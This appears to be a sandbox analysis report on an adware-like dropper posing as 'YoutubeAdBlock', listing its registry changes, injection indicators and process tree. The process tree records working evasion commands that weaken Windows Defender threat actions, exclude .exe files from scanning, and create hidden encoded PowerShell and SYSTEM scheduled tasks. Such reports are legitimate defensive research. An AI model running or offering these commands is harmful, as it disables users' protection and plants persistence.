Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IQGKeKDyerbxjhpLMFJM"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\tjjvRAW.dll"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\ziCKAEV.exe"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\kYCDidaec.dll"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\ziCKAEV.exe"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\ = "CGkZAbcvJHRRmdrCZwc_(((}vaQr[gdjBIXS"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	QSmuyCT.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeQSmuyCT.exepowershell.exepowershell.exepowershell.exe

pid	process
1620	powershell.exe
1620	powershell.exe
268	powershell.exe
1172	powershell.EXE
268	powershell.exe
2008	powershell.exe
2008	powershell.exe
1548	powershell.exe
1548	powershell.exe
1124	powershell.exe
1124	powershell.exe
1900	powershell.exe
1900	powershell.exe
1172	powershell.EXE
1768	powershell.exe
1768	powershell.exe
848	powershell.exe
848	powershell.exe
1560	powershell.exe
1560	powershell.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
1584	QSmuyCT.exe
556	powershell.exe
556	powershell.exe
1256	powershell.exe
1256	powershell.exe
1720	powershell.exe
1720	powershell.exe
1584	QSmuyCT.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exepowershell.EXEWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeIncreaseQuotaPrivilege	1660	WMIC.exe
Token: SeSecurityPrivilege	1660	WMIC.exe
Token: SeTakeOwnershipPrivilege	1660	WMIC.exe
Token: SeLoadDriverPrivilege	1660	WMIC.exe
Token: SeSystemProfilePrivilege	1660	WMIC.exe
Token: SeSystemtimePrivilege	1660	WMIC.exe
Token: SeProfSingleProcessPrivilege	1660	WMIC.exe
Token: SeIncBasePriorityPrivilege	1660	WMIC.exe
Token: SeCreatePagefilePrivilege	1660	WMIC.exe
Token: SeBackupPrivilege	1660	WMIC.exe
Token: SeRestorePrivilege	1660	WMIC.exe
Token: SeShutdownPrivilege	1660	WMIC.exe
Token: SeDebugPrivilege	1660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1660	WMIC.exe
Token: SeRemoteShutdownPrivilege	1660	WMIC.exe
Token: SeUndockPrivilege	1660	WMIC.exe
Token: SeManageVolumePrivilege	1660	WMIC.exe
Token: 33	1660	WMIC.exe
Token: 34	1660	WMIC.exe
Token: 35	1660	WMIC.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	1172	powershell.EXE
Token: SeIncreaseQuotaPrivilege	584	WMIC.exe
Token: SeSecurityPrivilege	584	WMIC.exe
Token: SeTakeOwnershipPrivilege	584	WMIC.exe
Token: SeLoadDriverPrivilege	584	WMIC.exe
Token: SeSystemProfilePrivilege	584	WMIC.exe
Token: SeSystemtimePrivilege	584	WMIC.exe
Token: SeProfSingleProcessPrivilege	584	WMIC.exe
Token: SeIncBasePriorityPrivilege	584	WMIC.exe
Token: SeCreatePagefilePrivilege	584	WMIC.exe
Token: SeBackupPrivilege	584	WMIC.exe
Token: SeRestorePrivilege	584	WMIC.exe
Token: SeShutdownPrivilege	584	WMIC.exe
Token: SeDebugPrivilege	584	WMIC.exe
Token: SeSystemEnvironmentPrivilege	584	WMIC.exe
Token: SeRemoteShutdownPrivilege	584	WMIC.exe
Token: SeUndockPrivilege	584	WMIC.exe
Token: SeManageVolumePrivilege	584	WMIC.exe
Token: 33	584	WMIC.exe
Token: 34	584	WMIC.exe
Token: 35	584	WMIC.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeIncreaseQuotaPrivilege	1432	WMIC.exe
Token: SeSecurityPrivilege	1432	WMIC.exe
Token: SeTakeOwnershipPrivilege	1432	WMIC.exe
Token: SeLoadDriverPrivilege	1432	WMIC.exe
Token: SeSystemProfilePrivilege	1432	WMIC.exe
Token: SeSystemtimePrivilege	1432	WMIC.exe
Token: SeProfSingleProcessPrivilege	1432	WMIC.exe
Token: SeIncBasePriorityPrivilege	1432	WMIC.exe
Token: SeCreatePagefilePrivilege	1432	WMIC.exe
Token: SeBackupPrivilege	1432	WMIC.exe
Token: SeRestorePrivilege	1432	WMIC.exe
Token: SeShutdownPrivilege	1432	WMIC.exe
Token: SeDebugPrivilege	1432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1432	WMIC.exe
Token: SeRemoteShutdownPrivilege	1432	WMIC.exe
Token: SeUndockPrivilege	1432	WMIC.exe
Token: SeManageVolumePrivilege	1432	WMIC.exe
Token: 33	1432	WMIC.exe
Token: 34	1432	WMIC.exe
Token: 35	1432	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

67897b2c1425411173ea7054d21a93e6.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 1632 wrote to memory of 2028	1632	67897b2c1425411173ea7054d21a93e6.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 2028 wrote to memory of 1700	2028	SimplInst.exe	SimplInst.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1700 wrote to memory of 1616	1700	SimplInst.exe	cmd.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 1616 wrote to memory of 512	1616	cmd.exe	forfiles.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 512 wrote to memory of 772	512	forfiles.exe	cmd.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1620	772	cmd.exe	powershell.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 1700 wrote to memory of 336	1700	SimplInst.exe	forfiles.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 336 wrote to memory of 960	336	forfiles.exe	cmd.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 632	960	cmd.exe	reg.exe
PID 960 wrote to memory of 1260	960	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\67897b2c1425411173ea7054d21a93e6.exe
"C:\Users\Admin\AppData\Local\Temp\67897b2c1425411173ea7054d21a93e6.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632

C:\Users\Admin\AppData\Local\Temp\7zS51A9.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028

C:\Users\Admin\AppData\Local\Temp\7zS53AC.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:512

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1696

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1152

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:960

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:632

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1260

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBATNWkuU" /SC once /ST 07:35:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1544

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBATNWkuU"
4⤵
PID:1816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBATNWkuU"
4⤵
PID:820

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bkckNrBYOjfprwtEPo" /SC once /ST 17:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\gBGvkxp.exe\" OV /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1660

C:\Windows\system32\taskeng.exe
taskeng.exe {A48748EA-5FAD-4014-86EF-0CB58DCC6631} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1172

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\pFdUAvGB\pzXmXPO.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\pFdUAvGB\pzXmXPO.exe pR /S
2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1756

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:556

